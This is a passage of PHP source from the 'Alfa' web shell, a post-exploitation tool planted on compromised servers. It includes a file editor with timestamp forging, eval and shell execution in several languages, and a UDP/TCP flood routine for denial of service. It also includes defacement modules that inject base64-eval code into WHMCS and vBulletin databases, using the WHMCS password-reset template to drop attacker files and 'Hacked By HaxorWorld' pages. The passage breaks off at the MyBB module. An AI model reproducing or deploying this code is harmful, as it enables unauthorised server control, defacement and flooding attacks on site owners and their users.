  3023. echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
  3024. echo '</div>';
  3025. switch($_POST['alfa2']){
  3026. case 'view':case 'edit':
  3027. @chdir($_POST['c']);
  3028. $disabled_btn = "";
  3029. if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
  3030. $disabled_btn = "disabled=disabled";
  3031. $disabled_btn_style= 'background: #ff0000;color: #fff;';
  3032. }
  3033. if(!empty($_POST['alfa3'])){
  3034. $_POST['alfa3'] = substr($_POST['alfa3'],1);
  3035. $time = @filemtime($_POST['alfa1']);
  3036. $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
  3037. if($chdir_fals&&$alfa_canruncmd){
  3038. $rname = $alfa1_decoded;
  3039. $randname = $rname.rand(111,9999);
  3040. $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
  3041. if($fp = @__write_file($filepath ,$_POST['alfa3'])){
  3042. alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
  3043. }
  3044. }
  3045. if($fp){
  3046. echo 'Saved!<br>';
  3047. @touch($_POST['alfa1'],$time,$time);
  3048. }
  3049. }
  3050. echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
  3051. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3052. echo '</pre></div></div>';
  3053. break;
  3054. case 'highlight':
  3055. @chdir($_POST['c']);
  3056. if(@is_readable($_POST['alfa1'])){
  3057. echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
  3058. $code = @highlight_file($_POST['alfa1'],true);
  3059. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
  3060. }
  3061. break;
  3062. case 'delete':
  3063. @chdir($_POST['c']);
  3064. if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
  3065. $deleted = true;
  3066. if(!@unlink($_POST['alfa1'])){
  3067. $deleted = false;
  3068. if($alfa_canruncmd){
  3069. if(_alfa_is_writable($_POST['alfa1'])){
  3070. alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
  3071. $deleted = true;
  3072. }
  3073. }
  3074. }
  3075. if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
  3076. break;
  3077. case 'chmod':
  3078. @chdir($_POST['c']);
  3079. if(!empty($_POST['alfa3'])){
  3080. $perms = 0;
  3081. for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
  3082. $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
  3083. if(!@chmod($_POST['alfa1'], $perms)){
  3084. if($chdir_fals&&$alfa_canruncmd){
  3085. alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
  3086. echo('Success!');
  3087. }else{
  3088. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
  3089. }else{echo('Success!');}
  3090. }
  3091. clearstatcache();
  3092. AlfaNum(8,9,10,7,6,5,4,2,1);
  3093. if($chdir_fals){
  3094. $file_perm = $file_info[5];
  3095. }else{
  3096. $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
  3097. }
  3098. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
  3099. break;
  3100. case 'hexdump':
  3101. @chdir($_POST['c']);
  3102. $c = __read_file($_POST['alfa1']);
  3103. $n = 0;
  3104. $h = array('00000000<br>','','');
  3105. $len = strlen($c);
  3106. for ($i=0; $i<$len; ++$i) {
  3107. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  3108. switch ( ord($c[$i]) ) {
  3109. case 0: $h[2] .= ' '; break;
  3110. case 9: $h[2] .= ' '; break;
  3111. case 10: $h[2] .= ' '; break;
  3112. case 13: $h[2] .= ' '; break;
  3113. default: $h[2] .= $c[$i]; break;
  3114. }
  3115. $n++;
  3116. if ($n == 32) {
  3117. $n = 0;
  3118. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  3119. $h[1] .= '<br>';
  3120. $h[2] .= "\n";
  3121. }
  3122. }
  3123. echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
  3124. break;
  3125. case 'rename':
  3126. @chdir($_POST['c']);
  3127. $alfa1_escape = addslashes($_POST["alfa1"]);
  3128. $alfa3_escape = addslashes($_POST["alfa3"]);
  3129. if(!empty($_POST['alfa3'])){
  3130. $cmd_rename = false;
  3131. if($chdir_fals&&$alfa_canruncmd){
  3132. if(_alfa_is_writable($_POST['alfa1'])){
  3133. $alfa1_escape = addslashes($alfa1_decoded);
  3134. alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
  3135. }else{
  3136. $cmd_rename = true;
  3137. }
  3138. }else{
  3139. $alfa1_escape = addslashes($_POST["alfa1"]);
  3140. }
  3141. if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
  3142. echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
  3143. }
  3144. echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
  3145. break;
  3146. case 'touch':
  3147. @chdir($_POST['c']);
  3148. if( !empty($_POST['alfa3']) ) {
  3149. $time = strtotime($_POST['alfa3']);
  3150. if($time){
  3151. $touched = false;
  3152. if($chdir_fals&&$alfa_canruncmd){
  3153. alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
  3154. $touched = true;
  3155. }
  3156. if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
  3157. echo 'Fail!';
  3158. else
  3159. echo 'Touched!';
  3160. } else echo 'Bad time format!';
  3161. }
  3162. clearstatcache();
  3163. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
  3164. break;
  3165. case 'image':
  3166. @chdir($_POST['c']);
  3167. echo('<hr>');
  3168. $file = $_POST['alfa1'];
  3169. $image_info = @getimagesize($file);
  3170. if(is_array($image_info)||$chdir_fals){
  3171. $width = (int)$image_info[0];
  3172. $height = (int)$image_info[1];
  3173. if($chdir_fals&&$alfa_canruncmd){
  3174. $source = alfaEx("cat '".addslashes($file)."' | base64");
  3175. list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
  3176. $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
  3177. $image_info['mime'] = $mime[1];
  3178. }else{
  3179. $source = __ZW5jb2Rlcg(__read_file($file, false));
  3180. }
  3181. $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
  3182. if($width > 800){$width = 800;}
  3183. echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
  3184. }
  3185. break;
  3186. }
  3187. echo '</div>';
  3188. alfaFooter();
  3189. }
  3190. function findicon($file,$type){
  3191. $s = 'http://solevisible.com/icons/';
  3192. $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
  3193. if($type!='file'){
  3194. return ($file=='..'?$s.'back.png':$s.'folder.png');
  3195. }else{
  3196. $ext = explode('.',$file);
  3197. $ext = end($ext);
  3198. $ext = strtolower($ext);
  3199. return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
  3200. }
  3201. }
  3202. function alfadlfile(){
  3203. if(isset($_POST['c'],$_POST['file'])){
  3204. $basename = rawurldecode(basename($_POST['file']));
  3205. $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
  3206. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3207. if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
  3208. ob_start("ob_gzhandler", 4096);
  3209. header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
  3210. header("Content-Type: application/octet-stream");
  3211. if($GLOBALS["glob_chdir_false"]){
  3212. $randname = $basename.rand(111,9999);
  3213. $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
  3214. $filepath = $scriptpath."/".$randname;
  3215. if(_alfa_is_writable($scriptpath)){
  3216. alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
  3217. readfile($filepath);
  3218. @unlink($filepath);
  3219. }else{
  3220. alfaEx("cat '".addslashes($_POST["file"])."'");
  3221. }
  3222. }else{
  3223. readfile($_POST['file']);
  3224. }
  3225. }else echo('Error...!');}}
  3226. function __alfa_set_cookie($key, $value){
  3227. $_COOKIE[$key] = $value;
  3228. @setcookie($key, $value, time()+(86400 * 7), '/');
  3229. }
  3230. function alfaphpeval(){
  3231. if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
  3232. $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);
  3233. }else{
  3234. $tempdir = dirname(alfaEx("mktemp"));
  3235. __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));
  3236. }
  3237. alfahead();
  3238. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
  3239. echo '<div class=header>';
  3240. ob_start();
  3241. $INI=ini_get_all();
  3242. print '<table border=0><tr>'
  3243. .'<td class="listing"><font class="highlight_txt">Param</td>'
  3244. .'<td class="listing"><font class="highlight_txt">Global value</td>'
  3245. .'<td class="listing"><font class="highlight_txt">Local Value</td>'
  3246. .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
  3247. foreach ($INI as $param => $values)
  3248. print "\n".'<tr>'
  3249. .'<td class="listing"><b>'.$param.'</td>'
  3250. .'<td class="listing">'.$values['global_value'].' </td>'
  3251. .'<td class="listing">'.$values['local_value'].' </td>'
  3252. .'<td class="listing">'.$values['access'].' </td></tr>';
  3253. $tmp = ob_get_clean();
  3254. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3255. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3256. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3257. }
  3258. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
  3259. echo '<div class=header><style>.p {color:#000;}</style>';
  3260. ob_start();
  3261. phpinfo();
  3262. $tmp = ob_get_clean();
  3263. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3264. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3265. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3266. }
  3267. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
  3268. echo '<div class=header>';
  3269. ob_start();
  3270. $EXT=get_loaded_extensions();echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
  3271. echo '</div><br>';
  3272. }
  3273. $lang_html = "";
  3274. foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
  3275. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"&lt;?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
  3276. echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
  3277. if(!empty($_POST['alfa1'])){
  3278. if($_POST['alfa3']=="php"){
  3279. ob_start();
  3280. eval('?>'.$_POST['alfa1']);
  3281. $result = htmlspecialchars(ob_get_clean());
  3282. }elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
  3283. $lang = $_POST['alfa3'];
  3284. $filename = "temp".rand(11111,99999);
  3285. $temp = $tempdir."/".$filename ;
  3286. __write_file($filename, $_POST['alfa1']);
  3287. $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
  3288. @unlink($filename);
  3289. @unlink($temp);
  3290. }
  3291. echo '<textarea class="bigarea">'.$result.'</textarea>';
  3292. }
  3293. echo '</pre></div>';
  3294. alfafooter();
  3295. }
  3296. function alfahash(){
  3297. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  3298. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  3299. $stringTools = array(
  3300. 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
  3301. 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
  3302. 'strrev ( $string )' => 'strrev($s)',
  3303. 'bin2hex ( $string )' => 'bin2hex($s)',
  3304. 'hex2bin ( $string )' => 'hex2bin($s)',
  3305. 'md5 ( $string )' => 'md5($s)',
  3306. 'sha1 ( $string )' => 'sha1($s)',
  3307. 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
  3308. 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
  3309. 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
  3310. 'crypt ( $string )' => 'crypt($s)',
  3311. 'crc32 ( $string )' => 'crc32($s)',
  3312. 'str_rot13 ( $string )' => 'str_rot13($s)',
  3313. 'urlencode ( $string )' => 'urlencode($s)',
  3314. 'urldecode ( $string )' => 'urldecode($s)',
  3315. 'full_urlencode ( $string )' => 'full_urlencode($s)',
  3316. 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
  3317. 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
  3318. 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
  3319. 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
  3320. 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
  3321. 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
  3322. 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
  3323. );
  3324. alfahead();
  3325. echo '<div class=header>';
  3326. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
  3327. foreach($stringTools as $k => $v)
  3328. echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
  3329. echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
  3330. if(!empty($_POST['alfa1'])){
  3331. $string = addslashes($_POST['alfa2']);
  3332. $string = str_replace('\"','"',$string);
  3333. $alg = $_POST['alfa1'];
  3334. $code = str_replace('$s',"'".$string."'",$alg);
  3335. ob_start();
  3336. eval('echo '.$code.';');
  3337. $res = ob_get_contents();
  3338. ob_end_clean();
  3339. if(in_array($alg, $stringTools))echo '<textarea class="bigarea">'.htmlspecialchars($res).'</textarea>';
  3340. }
  3341. echo "</div>";
  3342. alfaFooter();
  3343. }
  3344. function alfados(){
  3345. alfahead();
  3346. echo '<div class=header>';
  3347. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
  3348. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
  3349. echo __pre();
  3350. $packets=0;
  3351. ignore_user_abort(true);
  3352. $exec_time=(int)$_POST['alfa2'];
  3353. $time=time();
  3354. $max_time=$exec_time+$time;
  3355. $host=$_POST['alfa1'];
  3356. $port=(int)$_POST['alfa3'];
  3357. $method=$_POST['alfa4'];
  3358. $out = str_repeat('X',65000);
  3359. while(1){
  3360. $packets++;
  3361. if(time() > $max_time){
  3362. break;
  3363. }
  3364. $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
  3365. if($fp){
  3366. fwrite($fp, $out);
  3367. fclose($fp);
  3368. }
  3369. }
  3370. echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
  3371. echo "</pre>";
  3372. }
  3373. echo '</div>';
  3374. alfafooter();
  3375. }
  3376. function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
  3377. function alfaIndexChanger(){
  3378. alfahead();
  3379. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
  3380. if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
  3381. echo __pre();
  3382. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
  3383. <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
  3384. ";
  3385. $table = array('td1' =>
  3386. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3387. 'td2' =>
  3388. array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  3389. 'td3' =>
  3390. array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
  3391. 'td4' =>
  3392. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3393. 'td5' =>
  3394. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3395. 'td6' =>
  3396. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3397. );
  3398. create_table($table);
  3399. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3400. <textarea name=index rows='19' cols='103'><title>Hacked By HaxorWorld</title><b>Hacked By HaxorWorld</b></textarea><br>
  3401. <input type='submit' value=' '>
  3402. </form></center></center>";
  3403. if(isset($_POST['alfa6'])){
  3404. $s0levisible="Powered By PJPTEAM Perfect Hunter";
  3405. $dbu = $_POST['alfa6'];
  3406. $path = $_POST['alfa5'];
  3407. $fname = $_POST['alfa4'];
  3408. $dbn = $_POST['alfa7'];
  3409. $dbp = $_POST['alfa8'];
  3410. $dbh = $_POST['alfa9'];
  3411. $index = $_POST['alfa10'];
  3412. $index = str_replace("\'","'",$index);
  3413. $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
  3414. $saveData = __ZW5jb2Rlcg($deface);
  3415. $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
  3416. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3417. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3418. $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  3419. $soleGet = mysqli_fetch_assoc($soleSave);
  3420. $tempSave1 = $soleGet['message'];
  3421. $tempSave = str_replace("'","\'",$tempSave1);
  3422. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
  3423. $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
  3424. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  3425. $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
  3426. if(function_exists('curl_version')){
  3427. $AlfaSole = new AlfaCURL(true);
  3428. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  3429. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  3430. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  3431. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  3432. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  3433. __alert('File Created...');
  3434. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
  3435. }else{
  3436. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
  3437. }}}}
  3438. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
  3439. echo __pre();
  3440. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
  3441. <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
  3442. ";
  3443. $table = array('td1' =>
  3444. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3445. 'td2' =>
  3446. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3447. 'td3' =>
  3448. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3449. 'td4' =>
  3450. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  3451. 'td5' =>
  3452. array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
  3453. );
  3454. create_table($table);
  3455. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3456. <textarea name='index' rows='19' cols='103'><title>Hacked By HaxorWorld</title><b>Hacked By HaxorWorld</b></textarea><br>
  3457. <input type='submit' value=' '></form></center></center>";
  3458. if($_POST['alfa8']=='>>'){
  3459. $s0levisible="Powered By PJPTEAM Perfect Hunter";
  3460. $dbu = $_POST['alfa2'];
  3461. $dbn = $_POST['alfa3'];
  3462. $dbp = $_POST['alfa4'];
  3463. $dbh = $_POST['alfa5'];
  3464. $index = $_POST['alfa6'];
  3465. $prefix = $_POST['alfa7'];
  3466. $index=str_replace("\'","'",$index);
  3467. $set_index = "{\${eval(base64_decode(\'";
  3468. $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
  3469. $set_index .= "\'))}}{\${exit()}}";
  3470. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3471. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3472. $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
  3473. $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
  3474. $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
  3475. @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
  3476. @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
  3477. @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
  3478. __alert('VB index changed...!');
  3479. }
  3480. }
  3481. }
  3482. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
  3483. echo __pre();
  3484. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
